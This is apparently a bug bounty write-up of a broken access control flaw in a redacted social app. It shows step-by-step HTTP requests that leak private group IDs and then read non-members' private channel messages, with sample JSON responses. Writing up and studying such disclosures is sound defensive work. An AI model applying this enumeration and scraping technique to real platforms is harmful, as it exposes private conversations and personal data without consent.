Broken Access Control on <Redacted-app> | Mass Private Message Exfiltration

Inspectiv Private program | API

Introduction

Redacted-app is a social platform that allows users to form groups for discussions. A key feature is "Private Groups," which are designed to be invite-only spaces hidden from the public.

While the frontend correctly restricts navigation to these groups for non-members, the backend API failed to enforce these access controls. This discrepancy allowed authenticated users to identify private groups and retrieve their message history without membership or an invitation.

Discovery: Identifying Private Group IDs

During the reconnaissance phase, I used the GAP (Get All Params) Burp Suite extension to analyze the application's JavaScript assets and API responses. This analysis highlighted the /api/v2/discovery/featured_groups api endpoint.

Although "featured" lists typically display public content, querying this endpoint returned metadata for groups explicitly marked with "visibility": "private".

/api/v2/discovery/featured_groups

Normally, a "featured" list implies public visibility. However, upon manually querying this endpoint, I noticed it returned a massive JSON object containing metadata for groups that were explicitly marked with "visibility":"private".

{
  "data": [
    {
      "group_uuid": "550e8400-e29b-41d4-a716-446655440000",
      "name": "The Secret Circle",
      "visibility": "private",
      "description": "Invite only discussion..."
    }
  ]
}

This was the first failure: ID Leaking. By exposing the UUIDs of private groups to the public

---

Unrestricted Enumeration of Private Channels

With a valid Private Group UUID (550e8400-e29b-41d4-a716-446655440000) in hand, the next logical step was to see if I could access its internal components.

A generic groups on this app is divided into "Channels" (e.g., General, Spoilers, Intros). I constructed a GET request to the channels endpoint, substituting the private group's ID.

GET /api/v2/groups/550e8400-e29b-41d4-a716-446655440000/channels HTTP/2
Host: api.redacted-target.com
Authorization: Bearer <low_priv_token>
Accept: application/json

Response:

HTTP/2 200 OK
Content-Type: application/json

{
  "total": 3,
  "channels": [
    {
      "channel_name": "General Chat",
      "channel_uuid": "c93f0962-d48e-4050-8b1a-21316d5b0350",
      "topic": "Private chats here",
      "last_activity_ts": "2025-12-10T16:50:05.607Z"
    },
    {
      "channel_name": "Lobby",
      "channel_uuid": "d82e1851-c59f-5161-9c2b-32427e6c1461",
      "is_default": true
    }
  ]
}

The server returned a 200 OK status. This confirmed that while the UI might block a non-member from seeing these channels, the API had no such qualms. I now had the channel_uuid (c93f0962-d48e-4050-8b1a-21316d5b0350) required to dig deeper.

---

The final step was accessing the actual user content. I crafted a request to the messages endpoint using the IDs harvested in the previous steps.

This is the trust boundary that should have been impenetrable. A user who is not a member of a private group should never be able to read its messages.

GET /api/v2/groups/550e8400-e29b-41d4-a716-446655440000/channels/c93f0962-d48e-4050-8b1a-21316d5b0350/messages HTTP/2
Host: api.redacted-target.com
Authorization: Bearer <attacker_token>

Response:

{
  "pagination": { "next": null },
  "messages": [
    {
      "message_id": "11223344-5566-7788-9900-aabbccddeeff",
      "author": {
        "user_uuid": "user_998877",
        "username": "victim_user",
        "avatar_url": "https://cdn.redacted-target.com/avatars/user_998877.png",
        "bio": "Avid reader...",
        "is_private": true
      },
      "content": "This is a strictly confidential message!!!!",
      "channel_uuid": "c93f0962-d48e-4050-8b1a-21316d5b0350",
      "timestamp": "2025-12-10T16:50:05.607Z"
    }
  ]
}

The API returned the full chat history.

---

This vulnerability completely nullified the concept of privacy on the platform.

• Mass Data Extraction: Because the Group IDs were leaked via a public endpoint, an attacker could script the entire process to scrape every private conversation on the platform.

• PII Leakage: The message objects contained detailed user information, connecting real identities to private discussions.

• Zero Interaction: The attack required no interaction from the victims. A silent observer could monitor private groups indefinitely.

Reference:

A01 Broken Access Control - OWASP Top 10:2025owasp.org

CWE - CWE-284: Improper Access Control (4.19)cwe.mitre.org